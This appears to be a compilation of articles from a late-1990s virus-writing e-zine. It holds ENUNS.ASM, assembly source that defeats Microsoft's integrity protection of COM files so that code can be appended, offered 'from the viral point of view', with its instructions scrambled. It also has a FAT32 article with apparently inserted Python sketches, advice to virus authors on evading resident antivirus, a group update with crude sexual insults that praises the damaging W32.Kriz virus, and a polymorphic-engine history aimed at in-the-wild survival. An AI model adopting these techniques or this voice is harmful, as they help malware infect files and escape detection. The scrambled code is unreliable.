ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³Diz is demonstation proggy to show easy way to handle Micro$oft's³ ³ENUNS protection of COM files from the viral point of the view ³ ³ ³ ³To compile the file use Borland's Turbo Assembler with following ³ ³switches: ³ ³ tasm enuns.asm ³ ³ tlink /t enuns.obj ³ ³ ³ ³The resulting enuns.com should have exactly 512 bytes. Exactly 1 ³ ³sector in size :P ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ equ equ
0Dh 0Ah
start: mov lea int
lea int mov or
ah, 1Ah dx, DTA 21h
mov ah, 9 dx, open_message 21h al, byte ptr ds:[80h] al, al jnc path lea dx, path_miss jmp short @@2
; own DTA (so we don't screw _argv)
; got parameter ?
path: cbw xchg ax, si mov byte ptr ds:[81h+si], '$' lea dx, assumed mov ah, 9 int 21h mov dx, 81h int 21h mov skip_space: mov cmp jne inc jmp
; print path+filename
byte ptr ds:[81h+si], 0 di, dx byte ptr [di], 20h search dx short skip_space
; avoid space in a front of path
search: mov ah, 4Eh int 21h jnc open_file lea dx, not_found @@2: jmp short @@1 open_file: mov ax, 3D02h int 21h jnc open_ok lea dx, open_error
; search the file ; print error message
; open file
ENUNS.ASM
@@1: jmp open_ok: xchg
short put_msg
; print error message
ax, bx
mov push mov mov int
ax, 4202h ax dx, 0FFF9h cx, 0FFFFh 21h
; seek 2 ENUNS
mov lea mov int
ah, 3Fh dx, enuns cx, 7 21h
; read it
add
word ptr [enuns+5], xtns + 7
pop cwd xor int
ax cx, cx 21h
; seek 2 end
mov lea mov int
ah, 40h dx, demo cx, xtns + 7 21h
; write additional data
mov int int
ah, 3Eh 21h 20h
mov int int
ah, 9 21h 20h
put_msg:
open_message: db 'ENUNS workaround demo by MGL',CR,LF,CR,LF,'$' path_miss: db 'No path specified !',CR,LF,CR,LF,'$' assumed: db 'Target file assumed : $' not_found: db 'File not found !$' open_error: db CR,LF,'Error opening target file!',CR,LF,'$' demo: db CR,LF,'ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿' db CR,LF,'³This text is added to the file just for the demonstration³' db CR,LF,'³of Micro$oft lameness in design of ENUNS protection ³' db CR,LF,'ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ' xtns equ $ - offset demo enuns db 7 dup (?) DTA: end start
Have you ever cared about the FAT filesystem? Have you experimented with the new one that Windows 95 brings? I played with the old FAT a long time ago and did a lot of work with it: disk recoveries, crashed disks, even repairing a disk by phone (computing all the numbers for the partition table and boot sector in my head and dictating them over the phone). I wrote several read/write FAT emulators (guess for what reasons ;-), some recovery utilities, disk swapping tools (changing internal DOS/Windows structures for swapping disks, booting from non-primary partitions, etc.) and on-the-fly disk mounting and unmounting utilities for DOS/Win. I would say I was quite familiar with FAT. But things have changed. Some time ago I installed a new Windows on my computer (you have to, under current conditions) and switched to FAT32. It is a bit slower, but functional. Before that I had my old (today I would say "really old") 1GB disk partitioned into 128MB partitions in order to have 2kB clusters. I used to have lots of small files, and to avoid wasting a lot of space I had many logical disks on that disk. With FAT32 all these things are forgotten. But even then I never checked the new disk structures. Then a nice spring evening came, and CIH did its job. Not on my disk, of course, as I have played with viruses for more than 8 years. I don't have any active viruses on my computer - for that reason I use the best AV around the globe: hiew ;-). But a friend of mine called me to say that his office disk had crashed (as well as his chief's disk and others) and asked me for help. "CIH" was my first idea. Of course I was right. Moreover, he wasn't the only one who asked me for help at that time. And so I gained experience with FAT32 immediately.
Well, let's have a look at what has changed under FAT32. Of course, cluster numbers are 32bit. What an advantage. However, as the upper 4 bits of the cluster number are reserved, this gives a maximum of 268,435,456 clusters. This makes the FAT very long and slows DOS down a lot, because it can't load all the data into its buffers at once and forgets the first entries it loaded - so it has to load them again, forgetting newer entries, then load the newer ones once again. If you are familiar with cache victim-selection algorithms, it is a classic example of the FIFO bug.
I'll divide my tour into some logical sections, covering what is new in all the structures. Most of the changes are driven by the need to access big disks. Really big disks. It has something to do with the int13 address space, BIOSes, and so on.
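To get a feeling for how long such a FAT can be, here is a small sketch in Python. The function name and the example volume (4GB with 4kB clusters) are only my illustration, not something taken from a real disk; the only facts used are that each FAT32 entry takes 4 bytes and that entries 0 and 1 are reserved.

```python
SECTOR_SIZE = 512          # bytes per sector on a hard disk
ENTRY_SIZE = 4             # one FAT32 entry is a 32-bit value

# 28 usable bits per entry give the theoretical ceiling on the FAT itself.
MAX_ENTRIES = 2 ** 28
MAX_FAT_BYTES = MAX_ENTRIES * ENTRY_SIZE

def fat_size_sectors(volume_bytes: int, cluster_bytes: int) -> int:
    """Rough number of sectors one FAT copy needs (hypothetical helper).

    The data area is approximated by the whole volume, so the result is
    a slight overestimate; entries 0 and 1 are reserved, hence the +2.
    """
    clusters = volume_bytes // cluster_bytes
    fat_bytes = (clusters + 2) * ENTRY_SIZE
    return (fat_bytes + SECTOR_SIZE - 1) // SECTOR_SIZE   # round up

if __name__ == "__main__":
    print("largest possible FAT:", MAX_FAT_BYTES // 2 ** 20, "MB")
    print("4GB volume, 4kB clusters:",
          fat_size_sectors(4 * 2 ** 30, 4096), "sectors per FAT copy")
```

Even a modest disk ends up with thousands of FAT sectors, far more than DOS buffers can hold at once.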
Partition table
There are two main changes. First, the code itself was changed to support new methods of accessing huge disks. You have to think about the address space used for accessing sectors on disk. Maybe some of you remember how the 512MB limit was famously broken. Some time ago the maximum coordinates were:
- 6 bits for sector number (starting from 1) - max 63 sectors
- 6 bits for head number (starting from 0) - max 64 heads. However, this is slightly implementation dependent. In the general description the whole DH register used with 13/02 (int 13, ah=02) should contain the head number, which allows 256 heads, but Award BIOS uses the highest two bits of DH for the highest track bits, and so does AMI as far as I know.
- 12 bits for cylinder (starting from 0) - max 4096 cylinders (or tracks). This also causes some incompatibility, as the original documentation refers to 10 bits for tracks (max 1024) - CH plus the 2 highest bits of CL - but most BIOSes I know also use the highest two bits of DH as additional bits.
However, thinking about a maximum of 6/6/12 bits or 6/8/10 bits leads to the same result. But some BIOSes (IBM based) support only 4 bits for the head and, of course, 10 bits for the track. The result is 63*16*1024 sectors (512 bytes each), which is nearly the famous 512MB limit. In the old times such disks used disk managers to overcome this limit under all BIOSes (usually emulating the int13 call with controller commands that perform LBA access). LBA, introduced at that time, means Logical Block Address - it replaces the old geometry addressing (track/head/sector) with a logical sector number.
Well, the 512MB limit is over, but there is another limit, given by the maximum number addressable with the 3 bytes used for old-style access: 63*64*4096 sectors - the 8GB limit. By the way, MS-DOS (and Win95/98 as well, as it still relies on old DOS routines) has trouble using head 255, so disks must be mapped with a maximum of 255 heads (0..254, which MS-DOS can handle). Here you can see how big Microsoft's influence on hardware manufacturers is: because of a bug in a very old OS, they still ship hardware that works around these problems. Moreover, none of the disks I have seen within the last 2 years uses its real geometry; instead they internally translate the logical geometry reported to the BIOS and DOS into the physical one. Well, it is unbelievable that today's disk would have 255 surfaces, which means 128 physical magnetic platters with surfaces on both sides - how could you fit that into a disk package approximately an inch high? ;-)
Well, back to the 8GB limit of old-style addressing (which must stay there, otherwise DOS - and its graphical frontend called Windows - can't be started). This limit can't be bypassed simply by adding some bits. New routines for reading had to be introduced. Have a look at the current partition table code and read: the old 13/02 routines are still there, but preferably it uses the new EDD functions (Enhanced Disk Drive - originally found in Phoenix BIOS, but available in AWARD as well).
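The limits above are plain multiplication, so they are easy to check. The following Python sketch only redoes the arithmetic from the text and adds the usual CHS to LBA conversion; the function names are mine and nothing here talks to a real BIOS.

```python
SECTOR_SIZE = 512  # bytes

def chs_capacity(cylinders: int, heads: int, sectors_per_track: int) -> int:
    """Bytes addressable with the given CHS geometry."""
    return cylinders * heads * sectors_per_track * SECTOR_SIZE

def chs_to_lba(c: int, h: int, s: int, heads: int, sectors_per_track: int) -> int:
    """Logical sector number of a CHS address (sectors are numbered from 1)."""
    return (c * heads + h) * sectors_per_track + (s - 1)

if __name__ == "__main__":
    # 10-bit cylinder, 4-bit head, 6-bit sector: the "512MB" limit
    print(chs_capacity(1024, 16, 63) / 2 ** 20, "MB")
    # 6/6/12 bits and 6/8/10 bits give the same total: the "8GB" limit
    print(chs_capacity(4096, 64, 63) / 2 ** 30, "GB")
    print(chs_capacity(1024, 256, 63) / 2 ** 30, "GB")
    # what is left when head 255 has to be avoided
    print(chs_capacity(1024, 255, 63) / 2 ** 30, "GB")
```

Both bit layouts spend 24 bits, one value of the sector field is lost because sectors start at 1, and that is why the two "8GB" products are identical.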
Its presence is detected by calling 13/41, and it is accessed via 13/42, using a qword LBA for addressing sectors. This qword can't be derived from the old addressing bytes, as there aren't enough bits to cover all the needed information. That's why the beginning relative sector field, which has dword size, is used. Of course, this introduces a new limit of 4G sectors = 2TB. Too bad, isn't it? Disk sizes are increasing rapidly; I hope these structures will be changed within the next few years.
There are also four new filesystem codes for partition table entries, used for FAT32 disks:
0Bh - FAT32 (32bit FAT, up to 2047GB)
0Ch - FAT32x (same as FAT32, but uses LBA - logical block address - for accessing)
0Eh - DOSX13 (same as 06h - 16bit FAT for partitions larger than 32MB, but with LBA accessing)
0Fh - DOSX13x (same as 05h - extended partition, but with LBA accessing)
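As an illustration, a 16-byte partition table entry can be decoded like this in Python. The layout used (boot flag, packed CHS start, type, packed CHS end, dword relative sector, dword sector count) is the classic one; the function names and the dictionary keys are just my own choice for this sketch.

```python
import struct

# The four new type codes listed above
NEW_TYPES = {
    0x0B: "FAT32",
    0x0C: "FAT32x (LBA)",
    0x0E: "DOSX13 (16bit FAT, LBA)",
    0x0F: "DOSX13x (extended, LBA)",
}

# A dword sector count times 512-byte sectors: the 2TB ceiling
MAX_PARTITION_BYTES = 2 ** 32 * 512

def unpack_chs(raw: bytes):
    """Decode the 3 packed CHS bytes: head, sector + 2 high cylinder bits, cylinder low byte."""
    head = raw[0]
    sector = raw[1] & 0x3F
    cylinder = ((raw[1] & 0xC0) << 2) | raw[2]
    return cylinder, head, sector

def parse_partition_entry(entry: bytes) -> dict:
    """Decode one 16-byte partition table entry (hypothetical helper)."""
    if len(entry) != 16:
        raise ValueError("a partition entry is exactly 16 bytes")
    boot, chs_first, ptype, chs_last, lba_first, sectors = struct.unpack(
        "<B3sB3sII", entry)
    return {
        "active": boot == 0x80,
        "type": ptype,
        "type_name": NEW_TYPES.get(ptype, "other"),
        "chs_first": unpack_chs(chs_first),
        "chs_last": unpack_chs(chs_last),
        "lba_first": lba_first,      # beginning relative sector (dword)
        "sectors": sectors,
    }
```

For the LBA types (0Ch, 0Eh, 0Fh) only lba_first and sectors are meaningful on a big disk; the packed CHS fields simply saturate.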
Logical disc structure
We can now access the disk and its sectors. The logical disk follows - its organisation is nearly unchanged, for compatibility reasons. There is a boot sector and reserved sectors, two copies of the FAT, and clusters containing directories and files. Now, as with the whole FAT32 implementation, I have two pieces of news: a bad one and a good one. The good one is that Microsoft is learning from its old mistakes and correcting them - the root directory no longer has a fixed position and lives in clusters of its own, so it can grow beyond the limited number of items of previous versions. The bad news is that MS still sticks to a bad and unreliable filesystem, with slow access, not statistically optimized for the files typically used. Of course, there is NTFS, but people still prefer FAT-based filesystems.
Boot sector
The boot sector is no longer a sector. Funny, isn't it? We should rather call it a boot record (or superblock, for linux freaks) because it is now stored in the first three sectors. Moreover, it is usually mirrored by default to sectors 6-8 (a hotlink backup of the boot sector), but its coordinates are stored in the boot sector, so once that is lost you generally can't find the copy :-) Here are the offsets and meanings of the values in the boot sector(s), given as linear offsets, which means that offset 0x0200 is sector 1, offset 0x0000. Code is now stored in sectors 0 and 2.
0x0003: OEM ID (8 chars) - usually "MSWIN4.1" (or 4.0 for Win95)
0x000b: bytes per sector (word) - always 512 for hard disks
0x000d: sectors per cluster (byte)
0x000e: reserved sectors at beginning (word) - usually 32 but can vary (counted with sector 0)
0x0010: FAT copies (byte) - always 2 for hard disks
0x0015: media descriptor (byte) - always F8 for hard disks
0x0016: sectors per FAT (word) - 0 for FAT32, as the FAT can be really long
0x0018: sectors per track (word) - by default contains translation mode values
0x001a: sides (word)
0x001c: special hidden sectors (dword) - usually 63
0x0020: big total number of sectors (dword)
0x0024: big total sectors per FAT (dword)
0x0028: FAT flags (word) - bits 0-3: 0-based number of the active FAT, i.e. the FAT being in use, valid only if mirroring is disabled; bit 7: set when mirroring is disabled and only the active FAT is used (clear means all FAT copies are kept mirrored); bits 4-6 and 8-15 are reserved. In other words, you can avoid using a FAT copy that contains physically damaged sectors - but someone has to set it up :)
0x002a: filesystem version major (byte)
0x002b: filesystem version minor (byte) - 0.0 is all I have seen so far
0x002c: first cluster of root directory (dword)
0x0030: FS sector number (word) - usually 1 - where the rest of the boot record, the FileSystem information, is stored (0FFFFh if there is no FSINFO sector, otherwise must be more than zero and less than the reserved sector count)
0x0032: hotlink - backup boot sector (word) - usually 6 (same as above: 0FFFFh for no backup, 1..reserved-1 otherwise)
0x0040: physical drive number (byte)
0x0042: extended boot record signature (byte) - 0x29
0x0043: volume serial number (dword)
0x0047: volume label (11 chars)
0x0052: filesystem ID (8 chars) - "FAT32 "
0x01fc: signature (dword) - aa550000
0x0200: extended boot signature (dword) - 41615252 "RRaA" (wow! no Mark Zbikowski and his 'MZ' everywhere anymore, seems Bill employed someone else ;-)
0x03e4: FSINFO signature (dword) - 61417272 "rrAa"
0x03e8: free cluster count (dword) - as it takes a long time to go through the whole FAT, the number of free clusters is stored here (0FFFFFFFFh if unknown)
0x03ec: next free cluster (dword) - to speed up free space lookup
0x03fc: FSINFO ending signature (dword) - aa550000
0x05fc: signature (dword) - aa550000
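The table translates almost directly into a few unpack calls. This is only a sketch in Python with names of my own; it assumes the FSINFO sector lies inside the buffer passed in, and it reads FAT flags bit 7 the way Microsoft's FAT specification defines it (bit set = mirroring disabled, only the active FAT is used).

```python
import struct

def parse_fat32_boot_record(rec: bytes) -> dict:
    """Decode selected FAT32 boot record fields from raw sectors 0..2."""
    if struct.unpack_from("<I", rec, 0x1FC)[0] != 0xAA550000:
        raise ValueError("boot sector signature not found")
    bps, spc, reserved, fats = struct.unpack_from("<HBHB", rec, 0x0B)
    total, fat_sectors, flags = struct.unpack_from("<IIH", rec, 0x20)
    root_cluster, fsinfo_sec, backup_sec = struct.unpack_from("<IHH", rec, 0x2C)
    info = {
        "oem_id": rec[0x03:0x0B].decode("ascii", "replace"),
        "bytes_per_sector": bps,
        "sectors_per_cluster": spc,
        "reserved_sectors": reserved,
        "fat_copies": fats,
        "total_sectors": total,
        "sectors_per_fat": fat_sectors,
        "active_fat": flags & 0x0F,            # meaningful when not mirrored
        "fat_mirrored": not (flags & 0x80),    # bit 7 set = mirroring off
        "root_cluster": root_cluster,
        "backup_boot_sector": backup_sec,
        # the first FAT starts right after the reserved area
        "first_fat_sector": reserved,
        "first_data_sector": reserved + fats * fat_sectors,
    }
    if fsinfo_sec != 0xFFFF:
        base = fsinfo_sec * bps
        lead = struct.unpack_from("<I", rec, base)[0]
        sig, free, nxt = struct.unpack_from("<III", rec, base + 0x1E4)
        if lead == 0x41615252 and sig == 0x61417272:   # "RRaA" / "rrAa"
            info["free_clusters"] = free
            info["next_free_cluster"] = nxt
    return info

def cluster_to_sector(info: dict, cluster: int) -> int:
    """First sector of a data cluster; cluster numbering starts at 2."""
    return info["first_data_sector"] + (cluster - 2) * info["sectors_per_cluster"]
```

With this in hand, cluster_to_sector(info, info["root_cluster"]) gives the sector where the root directory starts, relative to the beginning of the logical disk.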
FAT - 32bit File Allocation Table
By skipping the reserved sectors (usually 32) you reach the file allocation table. The rest of the reserved area is cleared; so far only the boot sector(s) and their backup can be found there. But in the future, who knows. The FAT itself starts with the known F8 FF FF 0F pattern. The next entry, for cluster 1, can't be used either (as in the past); its value in the FAT is initialized to FF FF FF 07. The rest contains the FAT data itself, starting with cluster 2 at offset 8 in the FAT. The principle of FAT lookup is the same as before, but now it uses a structured 32bit value: 4+28 bits. The low 28 bits hold the cluster number (FFFFFF8 to FFFFFFF for end of chain, FFFFFF7 for a bad cluster); the upper 4 bits are reserved and Microsoft requires them to be preserved when modifying FAT entries. The stored form is, for example, FF FF FF 0F for the end cluster.
The FAT can be very long - up to several thousand sectors - which of course slows down all operations. Caching it takes lots of memory, which is unrealistic with the buffers available under DOS. But this lets disks survive CIH's attack: it destroys about the first 2000 sectors of the disk, but if you have FAT32 (really long), the second copy of the FAT is usually untouched. All you need to do to repair the disk after CIH is to copy the second FAT over the first, reconstruct the boot sector (copy it from another disk and type in the correct values) and write some numbers into the partition table. A few minutes of work - and the disk is repaired like nothing happened. Including the files infected by CIH too, of course ;-)
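Following a cluster chain with the 4+28 bit entries can be sketched like this in Python. The FAT is assumed to be already loaded into a bytearray; the helper names are mine, and the marker values follow Microsoft's FAT specification (0FFFFFF7h bad cluster, 0FFFFFF8h and above end of chain).

```python
import struct

CLUSTER_MASK = 0x0FFFFFFF    # low 28 bits carry the cluster number
RESERVED_MASK = 0xF0000000   # upper 4 bits must be preserved on write
BAD_CLUSTER = 0x0FFFFFF7
END_OF_CHAIN = 0x0FFFFFF8    # any value from here up ends a chain

def read_entry(fat: bytearray, cluster: int) -> int:
    """Raw 32-bit FAT entry, reserved bits included."""
    return struct.unpack_from("<I", fat, cluster * 4)[0]

def write_entry(fat: bytearray, cluster: int, value: int) -> None:
    """Store a new 28-bit value, keeping the reserved upper 4 bits."""
    old = read_entry(fat, cluster)
    new = (old & RESERVED_MASK) | (value & CLUSTER_MASK)
    struct.pack_into("<I", fat, cluster * 4, new)

def follow_chain(fat: bytearray, first: int) -> list:
    """List of clusters belonging to the file starting at 'first'."""
    entries = len(fat) // 4
    chain = []
    cluster = first
    while True:
        if cluster < 2 or cluster >= entries:
            raise ValueError("chain leaves the FAT or hits a free entry")
        if len(chain) >= entries:
            raise ValueError("chain loops")
        chain.append(cluster)
        nxt = read_entry(fat, cluster) & CLUSTER_MASK
        if nxt >= END_OF_CHAIN:
            return chain
        if nxt == BAD_CLUSTER:
            raise ValueError("chain runs into a bad cluster")
        cluster = nxt
```

The same read_entry call applied to the second FAT copy is what a repair after CIH boils down to: the second copy is read sector by sector and written over the damaged first one.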
Directory entries
I will not speak about LFN entries, as I think they are already well known. All I want to describe is where the 32bit cluster value is stored. The low part of the cluster number is at its original location, the word at +1a bytes in the directory entry. The high word is stored at +14 in the same entry. Together they form a real index into the FAT, like under the old fat16/12 system. I should also mention that the largest possible file on FAT32 is 4GB minus 2 bytes.
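Putting the two words together takes one shift. A minimal Python sketch, assuming a plain 32-byte short-name entry (not an LFN entry) in the classic layout; the function names are my own.

```python
import struct

def first_cluster(entry: bytes) -> int:
    """32-bit starting cluster of a 32-byte short directory entry."""
    if len(entry) != 32:
        raise ValueError("a directory entry is exactly 32 bytes")
    high = struct.unpack_from("<H", entry, 0x14)[0]   # new FAT32 high word
    low = struct.unpack_from("<H", entry, 0x1A)[0]    # original location
    return (high << 16) | low

def file_size(entry: bytes) -> int:
    """File size in bytes, the dword at +1c."""
    return struct.unpack_from("<I", entry, 0x1C)[0]
```

Old tools that only read the word at +1a silently see a wrong cluster as soon as a file starts above cluster 65535.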
My short description is now over. Are you happy about the FAT32 features? Where the hell are the features? Everything is done as usual - Microsoft extends all the stuff just enough to keep it working, keeping all the fears alive. There is no reason to rely on old traditions, yet MS only breaks the limits - just like with dos7 and its graphical interface - keeping all the bugs as a tradition that came from win 3.1, old dos, cp/m, etc, etc...
flush
MGL originally placed here my older routines for reading/writing directly to the controller, and afterwards I added a fat12/16/32 emulator. However, I decided to throw it all away and rather discuss why I threw it away. Because it simply can't work... Let's start with a little question: do you use direct disk access in your piece of work? (Or would you like to?) Don't do that! There are many reasons why - you just have to think a bit and you'll surely find some of them. Some time ago virii competed with each other in tricks for passing blocking systems, writing to protected disks, or not being caught by resident scanners. Today this idea also looks good - by accessing disks without the operating system knowing about it, you'll not be found by any resident avir, of course (under Windows as well). It's like entry-point tunneling routines. They usually work - but only under laboratory conditions. And you have to be prepared for real life. If a vx can't survive in the real world, it is unusable - it doesn't matter that it replicates on your machine if it doesn't work on others.
The reason is simple - Microsoft designed all its resident drivers and Windows modules in the same way, stacking them one over another without an exactly defined interface, so anyone can do what he wants as long as he is consistent with the level above and the level below. Yeah, it works well, but you have to take care about the loading order of such modules, and know what each module is for and what data it has cached. And this is why it can't work under DOS or Windows. In DOS, for example, nearly every filesystem-based utility had to be resident on interrupt 21, creating some sort of chain of drivers, one depending on another. There is also the possibility of registering some of your dispatchers directly into DOS, but you have to know internal DOS stuff to do so - and it is of course slightly limited (but it is a bit of the thing I mean). So there are many drivers hooked over int 21: cache, Novell NetWare disk, resident antivirus (that's why we talk about it too). You can write some cute program that works on the disk without all the things I mentioned (no matter if you are just bypassing some drivers or directly emulating the filesystem) - on more complicated systems like those I mentioned before you will cause a disk crash. First, you can't access disks created by such drivers. Then, a driver might have something in its buffers, and you have no way to tell it to flush them. In that case you write, for example, to a data area on disk that is also cached by some cache program, and a couple of seconds later the cache flushes its buffer to disk, discarding your change. And if it happens in the FAT - you can easily imagine what can happen. Of course, it is possible to communicate with such programs, but as there is no common interface, you can't communicate with all the drivers in the world. And your virus can easily be noticed through a disk inconsistency or even a disk crash this way. Conclusion?
Well, you can do some direct things under DOS, but always remember to keep everything consistent - not only with the programs you have on your computer, but with the programs other users may have.
Under Windows 9x the situation is a bit similar. First, to avoid direct hardware manipulation and to keep the system more consistent, there is hardware virtualization. But you surely know how to fool it - it is quite easy, as you can enter Ring 0. As more things are integrated into Windows now (networking, various disks attached using the hardware device manager, built-in cache, etc.), these things become less important every day. And finally, third-party programmers now produce plug-ins for this OS (Windows) instead of extensions (like for DOS). However, I have heard some ideas about accessing the disk directly, but the reasons why it will not work are the same as above. The disk access dispatcher entrypoint can be rehooked under Windows as well, but if you want to bypass software that is resident in this way, keep in mind you have to do it consistently as well... And... good luck, and don't get caught by lusers because of a problem in your piece of work you didn't think about...
flush
Introduction First of all, let me inform you that this is no "Diary version II" contribution to this excellent zine. It is just an efford in keeping good, healthy traditions alive, if there's is such a thing. Anyways, since Mgl asked me to write a little something about "What's up since IR/G?" I couldn't deny him that. If you feel like you don't want to hear anything further concerning Immortal Riot and are sick tired of my (I=The Unforgiven) contributions stop reading right now. Then execute some nifty version of w32.Kriz on your imaginary-girlfriends' computer, connect to your virtual social life and try to hack your way out from your pity life and if you can't, well go fuck your boyfriend in his arse so you'll wake up the next morning with dry cum in your hair and shit and pubic hair in your right nosdril. If you however decided to continue reading, live long and prosper!
Background Immortal Riot was formed in 1993, which in a few words is quite some time ago. Think about 1993 for a few seconds. 1993 lacked a lot of things we today are taking for granted. To name a few examples, email, www, cellular-phones, Fast-Ethernet, Video-on-Demand, MP3, JAVA, Pentium, CD-recordable-devices, DOOM, digital&web-cameras, distance-jobs, online shops/zines/banks, the official Immortal Riot homepage, cheap media and other things.
The bad old times? Of course, some of you folks could actually access a few of the things mentioned above, but the scene was very different "back then". People would call different 'underground' BBS'es (often with) calling-cards and upload different stuff (often warez) and BBS-sysops would have a few "mail-nets" (like CCi/NuKE/FIDO) and everything worked OK with a 14400 bps modem. This is now considered the stone age and even though I liked playing games like Civilisation and WOLF-3D, writing trivial COM infectors, plaguing fido-net and so on, it comes a time when one realises that it's time to move on. When others moved on my learning JAVA, HTML, CGI, setting up www&ftp-sites, coding viruses for other platforms than DOS (Win95) I decided to take a step back and learn other things in life. I did however felt that Immortal Riot deserved to live on even though I decided to drop. I left the organisation to Sepultura and things was going steady, but Sep was left on his own and did pretty much about everything. I guess he felt like he needed some assistence and after a while IR turned IR/G as a possible solution. IR/G released Insane Reality #8 and now we've reached the topic for this article.
What's happend since IR/G Since IR#8 all members of IR/G once again turned lazy and decided to hang lose (i.e. do nada and enjoy the fame of being in the leete group IR/G. *joke*...). Well, the truth might be something like this. IR/G was organised by Rajaat and Sepultura and they had both been around for some time and perhaps they didn't
feel like organise IR/G anymore. I can't really answer why IR/G turned out as a failure since I wasn't around much but fact is that after a while (I dunno exactly how long) we (Immortal Riot) splitted with them (Genesis) due to unknown reasons and everything was silent (from both groups) for a very long time.. However, since "We splitted with Genesis due to unknown reasons" isn't exactly what I believe Mgl would like to publish in an article-entry I felt like had to ramble on about some other things and far more interesting things, for example where we're now.
Immortal Riot 1999 You could say that IR have a lot of members. I don't quite know exactly who're a member and who are not but that's not really important either. What's more important are the active ones. T2 are responsible for a lot of good, naughty viruses which all has tormented to world and the best example is perhaps w32.Krized. It's been reported here, there and everywhere and even though it only fuck-ups the computer once a year (go check when on http://www.coderz.net/ImmortalRiot) it has caused a bit of panic. T2 joined IR about a year ago and has ever sinced been giving computer-users around the world a hard time. Another new member is Captain Zero and we are all waiting for his projects to be distributed. Then how about Insane Reality ? Well, what can I say... If someone feels like organising a zine, please contact me. We have a lot of code to publish but lack some text-material. It's a great challange and a great fun to release a zine and you shouldn't miss this oppurtunity! If you currently not are a member of IR this is something that could be arranged.
IR for the future I have no clue, the future tend to have a few suprises up hers sleeve so I won't dare to mention anything about it. If you know something I don't, don't hesitate to mail me (
[email protected]).
Greets Greets goes to every one in who hanged on efnet #virus back in 1994 and actually TALKED and BREATHED viruses! :). Please Email-me! Of course, greetings to all new IR members who can continue where the old-timers left off and bear our colors with a great pride! Special thanks must however go to T2 for being an excellent representative of Immortal Riot. God bless you! IRONY! :).
How to contact us I can be reached on my hotmail adress, which is
[email protected]. All changes, code-updates and other new information will be up at our official site located at http://www.coderz.net/ImmortalRiot (where other IR-members also can be reached).
Disclaimer
This is only my version. If you think it's false, fake, untrue, or whatever, write me a little something and we'll somehow fix that. Don't held me responsible for being a goofball :).
Closing Words Enjoy the next millennium, your life, your time on the earth, don't waste it, do whatever makes you happy and never hesitate to leave things which aren't healthy for you. - The Unforgiven/Immortal Riot.
This article deals with a viral technology that has been widely documented, discussed and implemented. However, it is aimed at explaining certain design flaws in current polymorphic engines and proposing solutions for these flaws, as well as suggesting improvements to current technology. The discussion will present an overview of the history of polymorphism pertinent to our subject, anti-virus detection methods, and will present concepts needed for properly designing polymorphic engines with a view to their survival in the wild. It will also include a section on structuring and writing polymorphic engines.
The Evolution Of Polymorphic Engines And Their Significance. The history of polymorphism began with experimentation. Virus authors recognised the susceptibility of their viruses to scan strings and encrypted their code. Even then, the decryptors were fixed, so anti-virus software generally had little trouble with a virus that was analysed and for which a scan string was extracted. A number of authors would rewrite their viruses to create strains which weren't scanned for at the time. A select few, however, started experimenting with new technology. A German programmer going by the handle of ~knzyvo} implemented dynamic encryption into his Fish family. The Whale virus, however was a more notable event. 30 different encryptors were used for this virus, which meant the anti-virus researchers had to include multiple scan strings. Dark Avenger's Phoenix family would modify bytes of their own decryptors, thus forcing anti-virus software to use wildcard scan strings. An American anti-virus researcher named Mark Washburn wrote a family of viruses that would generate a different decryptor altogether for every time the virus would replicate. The real breakthrough in polymorphism was, though, the release of Dark Avenger's Mutation Engine, or MtE. This engine was distributed in a form of an object linkable to a file, and was what started the revolution in the way viruses were written. Anti-virus researchers were at a loss. The traditional methods of detection were obsolete, since this engine would have needed 4.2 billion signatures, many of which might be present in legitimate programs. Instead, most anti-virus researchers opted for methods like algorithmic scanning checking whether or not code in question could be produced by a polymorphic engine. Several months later, anti-virus software couldn't reliably detect MtE-generated decryptors. A second blow came to the anti-virus industry with the release of Trident Polymorphic Engine, written by Masud Khafir. 
A more complex algorithm was used for producing encryptors, and again, anti-virus researchers were left with the task of reliably detecting TPE. While the decryptors themselves weren't particularly sophisticated, they could easily be mistaken for encryption used in commercial software, and later, several other engines would be mistaken for TPE samples. A new concept was introduced in 1993. Neurobasher's new Tremor virus spread widely in Germany. It seemed to researchers that a suitable algorithm was devised for its detection, yet the virus continued to elude scanners in the wild. After thorough analysis of the virus's code, it was found that instead of generating random numbers, Tremor would use relatively immutable data to create its permutations. New strains would be generated every, say, full moon or on infecting a new system. This meant that the anti-virus researchers would need to spend even more time and effort on analysing a polymorphic virus lest they release an incomplete algorithm.
Meanwhile, across the channel, a British virus writer known as the Black Baron released his polymorphic viruses built around an engine called SMEG. This engine introduced the concept of generating decryptors with large amounts of junk instructions present in the decryptors. Once again, scanners had difficulty when confronted by a new polymorphic beast. It took a much longer time to analyse a piece of code and determine whether or not it was encrypted by SMEG by picking out the decryptor from the junk. [MGL's note: If you take closer look on SMEG, you will get the point - generated decryptors are huuuuge ] From 1992 to 1994, an unknown researcher in Uruguay busily created a family of 10 viruses, each more polymorphic than the last. The novelty of his approach rested in tracking the code that was generated, and producing decryptors that looked even more like the real thing. It became difficult to distinguish polymorphic decryptors from real code. Another 1994 engine that made a significant impact on the anti-virus industry was DSCE. Dark Slayer stated that his decryptors contained no loop, key, or start-up values. In a way, he was correct. However, it's an exaggeration of what the engine really did - these structures were concealed in a massive (at the time) decryptor by point-encrypting the opcodes that resembled a decryptor loop. Once again, scanners were slowed down by having to analyse the decryptor in depth. While there are several other polymorphic engines just as technically advanced as those mentioned above and the authors of which deserve just as much recognition, these are the ones that we need to illustrate the design of a solidly built polymorphic engine.
Polymorphic Virus Detection Methods.
